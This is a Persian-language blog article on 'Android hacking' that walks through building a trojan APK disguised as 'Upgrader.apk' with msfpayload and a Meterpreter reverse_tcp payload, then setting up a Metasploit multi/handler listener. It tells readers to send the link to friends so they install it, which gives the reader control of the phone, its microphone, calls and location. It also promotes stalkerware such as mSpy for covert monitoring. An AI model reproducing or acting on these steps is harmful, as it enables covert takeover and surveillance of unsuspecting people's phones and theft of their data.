برنامه نویسی و ITبرنامه‌نویسی موبایل

هک اندروید چیست

آشنایی با چگونگی هک اندروید

هک اندروید به شیوه های مختلفی اتفاق می افتد. ابتدا مخاطب را به شیوه های احساسی گول می زنند و اگر مخاطب فردی منطقی و آگاه بود از شیوه های دیگر به حریم خصوصی و اطلاعات شخصی او نفوذ می کنند. هک اندروید معمولا به کمک یک لینک مخرب یا پیام رمز نگاری شده مخرب صورت می گیرد.

 

ویدیو پییشنهادی : آموزش هک
آموزش هک

 

البته این امکان وجود دارد که به کمک نصب برنامه های نامعتبر، گوشی هک شود. یکی از شیوه هایی که اطلاعات کاربر به سرقت می رود اعتماد بی جا به وای فای رایگان است. کاربر پس از اتصال به شبکه اینترنت و تبادل اطلاعات این اجازه را به فردی که شبکه تحت نظر اوست میدهد. از این طریق فرد نا معتبر می تواند هک اندروید را انجام دهد.

 

آشنایی با چگونگی هک اندروید

 

برای جلوگیری از این اتفاق، در هنگام بروز رسانی سیستم عامل خود تعلل نکنید و به موقع این کار را انجام دهید. در بروز رسانی های جدید، نقاط نفوذی هکرها بسته می شوند.

برای اینکه برنامه های آلوده هک اندروید مورد استفاده کاربر قرار گیرد، به طور ساده تنها با یک ایمیل مخرب و یا پیامک حاوی لینک مخرب این کار را انجام دهید و صبر کنید تا کاربر اطلاعات را وارد کند.

 

مقاله پییشنهادی : هکر کلاه سفید
هکر کلاه سفید

 

از این قسمت به بعد ساده است. هک اندروید به این روش این امکان را به کاربر میدهد تا تمام مکالمات را به کمک میکروفن بشنود و اطلاعات را از طریق شبکه ذخیره کند. در نتیجه مکالمات، تماسها و لوکیشن کاربر در اختیار شما قرار میگیرد.

 

رنامه های آلوده هک اندروید

هک اندروید با kali 

به کمک زبان های برنامه نویسی هک اندروید صورت میگیرد. در این فضا با ساخت یکی اپلیکیشن تروجان کار خود را آغاز کنید. ترمینال کالی را باز کنید و از این کد استفاده کنید. 

 

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk

 

به جای L Host  اطلاعات local host کامپیوتر خود را وارد کنید. در مرحله بعدی ترمینال دیگری را باز کنید و در این فاصله صبر کنید برنامه ساخته شود.

 

مقاله پییشنهادی : هکر کلاه خاکستری
هکر کلاه خاکستری

 

سپس metasploit console را بارگذاری کنید. این کار را با تایپ این دستور انجام دهید. ” msfconsole ” سپس در مرحله سوم بهره بری چندگانه را انجام دهید تا اطلاعات را حفظ کنید. از دستور زیر برای multi-handler exploit استفاده کنید

 

use exploit/multi/handler

 

حالا exploit فعال شده و آماده استفاده است. با تایپ دستور reverse بارگذاری دوباره را راه اندازه کنید.

 

set payload android/meterpreter/reverse_tcp

حالا local host  را با دستور زیر مقدار دهی کنید. 

 

set LHOST 192.168.0.4

 

حالا تمام شرایط لازم انجام شده تا exploit را انجام دهید. در نهایت نرم افزار شما ساخته شده و در پوشه ریشه با نامی که به آن داده اید ذخیره شده است.

شما می توانید این برنامه را در فایل apk به گوشی همراه خود منتقل کنید. سپس به کمک وب سایت های انتقال اطلاعات برای آنها لینک سازی کنید.

 

 

تمام اقدامات برای هک اندروید انجام شده. حالا لینک مورد نظر را به دوستان خود بفرستید و منتظر بمانید از آنها استفاده کنند. این لینک تنها حاوی نصب برنامه است و به ظاهر هیچ عامل مخربی ندارد. ولی منبع آن مشخص نیست.

 

آشنایی با هک اندروید

 

پس از نصب نرم افزار توسط کاربر می توانید در ترمینال kali هر دستوری را بدهید کنترل گوشی دست شماست. هک اندروید به همین سادگی اتفاق می افتد.

برنامه های مخصوص هک برای اندروید

روش ساده تری برای هک اندروید وجود دارد. شاید همه افراد در زمینه برنامه نویسی اطلاعات نداشته باشند. در زمینه هک روش های دیگر هم وجود دارد. سیستم عامل متن باز این امکان را میدهد تا با بررسی حفره های امنیتی هکر ها از آنها سو استفاده کنند.

از معروف ترین برنامه های هک می توان به برنامه زیر اشاره نمود.

  • mSpy
  • ZAnti
  • CSPloit
  • Fing network tools
  • Network Manager
  • OrbotT
  • Nmap 

نحوه عملکرد این برنامه ها تا حدودی یکسان است. عملکرد آنها را به اختصار توضیح می دهیم. mSpy یکی از معروف ترین برنامه های هک اندروید است.

 

ویدیو پییشنهادی : آموزش اندروید
آموزش برنامه نویسی اندروید

 

به منظور فعال سازی شما باید به طور فیزیکی به دستگاه کاربر دسترسی داشته باشید. از ویژگی های این نرم افزار ارائه تمام مکالمات فرد در تمام اپلیکیشن های ارتباطی است.

شما این امکان را دارید تمامی مطالب را به کمک گوشی همراه خود زیر نظر داشته باشید. CSPloit نرم افزاری قوی در زمینه هک اندروید است.

ولی تنها روی دستگاه های روت شده قابل اجراست. این نرم افزار ابزار های ویژه ای را در زمینه هک به شما ارائه میدهد. Fing network tools یکی از نرم افزار هایی است که به وسیله شبکه اینترنت کار میکند.

 

نحوه ی هک اندروید

 

پس از اینکه این برنامه روی گوشی شما نصب شما و به وای فای مورد نظر وصل شدید. تمام تنظیمات را در خود ذخیره میکند و نیازی به تنظیمات دوباره در دفعه بعد نیست. این نرم افزار به شما تمام گوشی های متصل به وای فای را نشان میدهد و سپس تمام اطلاعاتی را که آنها تبادل می کنند در اختیار شما میگذارد.

هدف از آموزش هک اندروید چیست؟

هک اندروید برای مقاصد مختلفی استفاده میشود. برخی اوقات کاربر می تواند دلایل قانع کننده ای برای هک داشته باشد. زمانی که کاربر از اطلاعات نفعی نبرد این کار منطقی است ولی در بیشتر اوقات این کار با هدفی از پیش تعیین شده صورت میگیرد.

در برخی اوقات از هک اندروید برای کنترل فرزندان استفاده می شود. هک به آنها اجازه میدهد تا فرزند را زیر نظر بگیرند و تمام مکان هایی که می رود اطلاع داشته باشند امکان مشاهده مکالمات برای آن فراهم می شود.

 

مقاله پییشنهادی : معرفی شبیه سازهای اندروید
معرفی شبیه سازهای اندروید

 

در موارد امنیتی و مهم تر هک از سوی مقامات پلیسی انجام می شوند آنها برای اینکار هم دلایل قانع کننده دارند و هم اجازه هک را دارند. این دستور قضایی به آنها داده می شود تا از اطلاعات کاربر کپی بگیرند و یا آنها را تحت نظر داشته باشند. اما هک اندروید اهداف دیگری هم دارد.

این اهداف نه منطقی است و نه به صورت قضایی اجازه طبیعی دارند. معمولا افراد از هک برای مقاصدی مثل فیشینگ و جرایم اینترنتی استفاده می کنند تا اطلاعات حساب آنها و اطلاعات مهم دیگری را داشته باشند تا بدین طریق حساب آنها را خالی کرده یا دست به افشای اطلاعات شخصی میزنند.

در برخی موارد برای اخاذی از افراد سو استفاده میشود. این اطلاعات شامل تمام اطلاعات فرد است. سارق دسترسی کاملی به گوشی فرد پیدا می کند  و از شیوه های مختلف به سرقت می پردازد.

سعید هابطی

چند سالی میشه که در زمینه سئو و دیجیتال مارکتینگ در حال فعالیت هستم. به موسیقی و فلسفه علاقه ی خاصی دارم و بیشتر زمان رو صرف مطالعه و نوازندگی می کنم.

نوشته های مشابه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا